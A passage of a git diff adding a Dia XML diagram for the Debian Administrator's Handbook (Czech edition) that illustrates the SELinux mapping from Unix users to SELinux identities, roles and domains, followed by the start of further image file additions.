+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="2.3999999999999999"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="1.9000000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#root#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="6.5,4.21"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O1">
+      <dia:attribute name="obj_pos">
+        <dia:point val="9.9,3.065"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="9.85,3.015;13.65,5.015"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="9.9,3.065"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="3.7000000000000002"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="1.9000000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#hertzog#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="11.75,4.21"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O2">
+      <dia:attribute name="obj_pos">
+        <dia:point val="12.115,7.335"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="12.065,7.285;15.385,9.285"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="12.115,7.335"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="3.2200000000000002"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="1.9000000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#user_u#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="13.725,8.48"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O3">
+      <dia:attribute name="obj_pos">
+        <dia:point val="5.3,7.335"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="5.25,7.285;7.75,9.285"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="5.3,7.335"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="2.3999999999999999"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="1.9000000000000004"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#root#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="6.5,8.48"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O4">
+      <dia:attribute name="obj_pos">
+        <dia:point val="12.1862,11.605"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="12.1362,11.555;15.3138,13.555"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="12.1862,11.605"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="3.0775000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="1.9000000000000004"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#user_r#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="13.725,12.75"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O5">
+      <dia:attribute name="obj_pos">
+        <dia:point val="4.425,11.605"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="4.375,11.555;8.625,13.555"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="4.425,11.605"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="4.1499999999999995"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="1.9000000000000004"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#sysadm_r#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="6.5,12.75"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O6">
+      <dia:attribute name="obj_pos">
+        <dia:point val="4.43125,15.875"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="4.38125,15.825;8.61875,17.825"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="4.43125,15.875"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="4.1375000000000002"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="1.9000000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#sysadm_t#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="6.5,17.02"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O7">
+      <dia:attribute name="obj_pos">
+        <dia:point val="12.1925,15.875"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="12.1425,15.825;15.3075,17.825"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="12.1925,15.875"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="3.0649999999999999"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="1.9000000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#user_t#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="13.725,17.02"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O8">
+      <dia:attribute name="obj_pos">
+        <dia:point val="14.525,3.065"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="14.475,3.015;18.275,5.015"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="14.525,3.065"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="3.7000000000000002"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="1.9000000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#lolando#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="16.375,4.21"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O9">
+      <dia:attribute name="obj_pos">
+        <dia:point val="6.5,5.0144"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="6.1382,4.9644;6.8618,7.4468"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="6.5,5.0144"/>
+        <dia:point val="6.5,7.335"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O0" connection="16"/>
+        <dia:connection handle="1" to="O3" connection="2"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O10">
+      <dia:attribute name="obj_pos">
+        <dia:point val="11.75,4.965"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="11.683,4.89799;12.9969,7.43517"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="11.75,4.965"/>
+        <dia:point val="12.925,7.335"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O1" connection="13"/>
+        <dia:connection handle="1" to="O2" connection="1"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O11">
+      <dia:attribute name="obj_pos">
+        <dia:point val="16.375,4.965"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="14.4548,4.89482;16.4452,7.42313"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="16.375,4.965"/>
+        <dia:point val="14.525,7.335"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O8" connection="13"/>
+        <dia:connection handle="1" to="O2" connection="3"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O12">
+      <dia:attribute name="obj_pos">
+        <dia:point val="6.5,9.235"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="6.1382,9.185;6.8618,11.7168"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="6.5,9.235"/>
+        <dia:point val="6.5,11.605"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O3" connection="13"/>
+        <dia:connection handle="1" to="O5" connection="2"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O13">
+      <dia:attribute name="obj_pos">
+        <dia:point val="6.5,9.235"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="6.43464,9.16964;12.3032,11.7144"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="6.5,9.235"/>
+        <dia:point val="12.2,11.605"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O3" connection="13"/>
+        <dia:connection handle="1" to="O4" connection="0"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O14">
+      <dia:attribute name="obj_pos">
+        <dia:point val="13.725,9.235"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="13.3632,9.185;14.0868,11.7168"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="13.725,9.235"/>
+        <dia:point val="13.725,11.605"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O2" connection="13"/>
+        <dia:connection handle="1" to="O4" connection="2"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O15">
+      <dia:attribute name="obj_pos">
+        <dia:point val="6.5,13.505"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="6.1382,13.455;6.8618,15.9868"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="6.5,13.505"/>
+        <dia:point val="6.5,15.875"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O5" connection="13"/>
+        <dia:connection handle="1" to="O6" connection="2"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O16">
+      <dia:attribute name="obj_pos">
+        <dia:point val="13.725,13.505"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="13.3632,13.455;14.0868,15.9868"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="13.725,13.505"/>
+        <dia:point val="13.725,15.875"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O4" connection="13"/>
+        <dia:connection handle="1" to="O7" connection="2"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Text" version="1" id="O17">
+      <dia:attribute name="obj_pos">
+        <dia:point val="19.725,4.25"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="19.725,3.655;23.52,4.4"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#Unix users#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="80" name="Helvetica-Bold"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="19.725,4.25"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="0"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+      <dia:attribute name="valign">
+        <dia:enum val="3"/>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Standard - Text" version="1" id="O18">
+      <dia:attribute name="obj_pos">
+        <dia:point val="19.725,8.09"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="19.725,7.47637;23.1936,9.07725"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#SELinux
+Identities#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="80" name="Helvetica-Bold"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="19.725,8.09"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="0"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+      <dia:attribute name="valign">
+        <dia:enum val="3"/>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Standard - Text" version="1" id="O19">
+      <dia:attribute name="obj_pos">
+        <dia:point val="19.725,12.74"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="19.725,12.1264;21.7111,12.9273"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#Roles#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="80" name="Helvetica-Bold"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="19.725,12.74"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="0"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+      <dia:attribute name="valign">
+        <dia:enum val="3"/>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Standard - Text" version="1" id="O20">
+      <dia:attribute name="obj_pos">
+        <dia:point val="19.725,16.99"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="19.725,16.3764;22.4911,17.1772"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#Domain#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="80" name="Helvetica-Bold"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="19.725,16.99"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="0"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+      <dia:attribute name="valign">
+        <dia:enum val="3"/>
+      </dia:attribute>
+    </dia:object>
+    <dia:group>
+      <dia:object type="Standard - Line" version="0" id="O21">
+        <dia:attribute name="obj_pos">
+          <dia:point val="20.95,13.8575"/>
+        </dia:attribute>
+        <dia:attribute name="obj_bb">
+          <dia:rectangle val="20.5882,13.8075;21.3118,15.8693"/>
+        </dia:attribute>
+        <dia:attribute name="conn_endpoints">
+          <dia:point val="20.95,13.8575"/>
+          <dia:point val="20.95,15.7575"/>
+        </dia:attribute>
+        <dia:attribute name="numcp">
+          <dia:int val="1"/>
+        </dia:attribute>
+        <dia:attribute name="end_arrow">
+          <dia:enum val="22"/>
+        </dia:attribute>
+        <dia:attribute name="end_arrow_length">
+          <dia:real val="0.5"/>
+        </dia:attribute>
+        <dia:attribute name="end_arrow_width">
+          <dia:real val="0.5"/>
+        </dia:attribute>
+      </dia:object>
+      <dia:object type="Standard - Text" version="1" id="O22">
+        <dia:attribute name="obj_pos">
+          <dia:point val="21.7,14.8075"/>
+        </dia:attribute>
+        <dia:attribute name="obj_bb">
+          <dia:rectangle val="21.7,14.4071;25.2636,15.2079"/>
+        </dia:attribute>
+        <dia:attribute name="text">
+          <dia:composite type="text">
+            <dia:attribute name="string">
+              <dia:string>#One to one#</dia:string>
+            </dia:attribute>
+            <dia:attribute name="font">
+              <dia:font family="sans" style="0" name="Helvetica"/>
+            </dia:attribute>
+            <dia:attribute name="height">
+              <dia:real val="0.80000000000000004"/>
+            </dia:attribute>
+            <dia:attribute name="pos">
+              <dia:point val="21.7,15.0207"/>
+            </dia:attribute>
+            <dia:attribute name="color">
+              <dia:color val="#000000"/>
+            </dia:attribute>
+            <dia:attribute name="alignment">
+              <dia:enum val="0"/>
+            </dia:attribute>
+          </dia:composite>
+        </dia:attribute>
+        <dia:attribute name="valign">
+          <dia:enum val="2"/>
+        </dia:attribute>
+      </dia:object>
+    </dia:group>
+    <dia:group>
+      <dia:object type="Standard - Line" version="0" id="O23">
+        <dia:attribute name="obj_pos">
+          <dia:point val="20.95,9.8075"/>
+        </dia:attribute>
+        <dia:attribute name="obj_bb">
+          <dia:rectangle val="20.5882,9.7575;21.3118,11.8193"/>
+        </dia:attribute>
+        <dia:attribute name="conn_endpoints">
+          <dia:point val="20.95,9.8075"/>
+          <dia:point val="20.95,11.7075"/>
+        </dia:attribute>
+        <dia:attribute name="numcp">
+          <dia:int val="1"/>
+        </dia:attribute>
+        <dia:attribute name="end_arrow">
+          <dia:enum val="22"/>
+        </dia:attribute>
+        <dia:attribute name="end_arrow_length">
+          <dia:real val="0.5"/>
+        </dia:attribute>
+        <dia:attribute name="end_arrow_width">
+          <dia:real val="0.5"/>
+        </dia:attribute>
+      </dia:object>
+      <dia:object type="Standard - Text" version="1" id="O24">
+        <dia:attribute name="obj_pos">
+          <dia:point val="21.7,10.7575"/>
+        </dia:attribute>
+        <dia:attribute name="obj_bb">
+          <dia:rectangle val="21.7,10.3571;24.5511,11.1579"/>
+        </dia:attribute>
+        <dia:attribute name="text">
+          <dia:composite type="text">
+            <dia:attribute name="string">
+              <dia:string>#One to N#</dia:string>
+            </dia:attribute>
+            <dia:attribute name="font">
+              <dia:font family="sans" style="0" name="Helvetica"/>
+            </dia:attribute>
+            <dia:attribute name="height">
+              <dia:real val="0.80000000000000004"/>
+            </dia:attribute>
+            <dia:attribute name="pos">
+              <dia:point val="21.7,10.9707"/>
+            </dia:attribute>
+            <dia:attribute name="color">
+              <dia:color val="#000000"/>
+            </dia:attribute>
+            <dia:attribute name="alignment">
+              <dia:enum val="0"/>
+            </dia:attribute>
+          </dia:composite>
+        </dia:attribute>
+        <dia:attribute name="valign">
+          <dia:enum val="2"/>
+        </dia:attribute>
+      </dia:object>
+    </dia:group>
+    <dia:group>
+      <dia:object type="Standard - Line" version="0" id="O25">
+        <dia:attribute name="obj_pos">
+          <dia:point val="20.95,5.33625"/>
+        </dia:attribute>
+        <dia:attribute name="obj_bb">
+          <dia:rectangle val="20.5882,5.28625;21.3118,7.34805"/>
+        </dia:attribute>
+        <dia:attribute name="conn_endpoints">
+          <dia:point val="20.95,5.33625"/>
+          <dia:point val="20.95,7.23625"/>
+        </dia:attribute>
+        <dia:attribute name="numcp">
+          <dia:int val="1"/>
+        </dia:attribute>
+        <dia:attribute name="end_arrow">
+          <dia:enum val="22"/>
+        </dia:attribute>
+        <dia:attribute name="end_arrow_length">
+          <dia:real val="0.5"/>
+        </dia:attribute>
+        <dia:attribute name="end_arrow_width">
+          <dia:real val="0.5"/>
+        </dia:attribute>
+      </dia:object>
+      <dia:object type="Standard - Text" version="1" id="O26">
+        <dia:attribute name="obj_pos">
+          <dia:point val="21.7,6.28625"/>
+        </dia:attribute>
+        <dia:attribute name="obj_bb">
+          <dia:rectangle val="21.7,5.88581;25.2636,6.68669"/>
+        </dia:attribute>
+        <dia:attribute name="text">
+          <dia:composite type="text">
+            <dia:attribute name="string">
+              <dia:string>#One to one#</dia:string>
+            </dia:attribute>
+            <dia:attribute name="font">
+              <dia:font family="sans" style="0" name="Helvetica"/>
+            </dia:attribute>
+            <dia:attribute name="height">
+              <dia:real val="0.80000000000000004"/>
+            </dia:attribute>
+            <dia:attribute name="pos">
+              <dia:point val="21.7,6.49944"/>
+            </dia:attribute>
+            <dia:attribute name="color">
+              <dia:color val="#000000"/>
+            </dia:attribute>
+            <dia:attribute name="alignment">
+              <dia:enum val="0"/>
+            </dia:attribute>
+          </dia:composite>
+        </dia:attribute>
+        <dia:attribute name="valign">
+          <dia:enum val="2"/>
+        </dia:attribute>
+      </dia:object>
+    </dia:group>
+  </dia:layer>
+</dia:diagram>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/selinux-context.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/selinux-context.png
new file mode 100644
index 000000000..debe7305d
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/selinux-context.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/selinux-transitions.dia b/publish/cs-CZ/Debian/9/html/debian-handbook/images/selinux-transitions.dia
new file mode 100644
index 000000000..91f55fb86
--- /dev/null
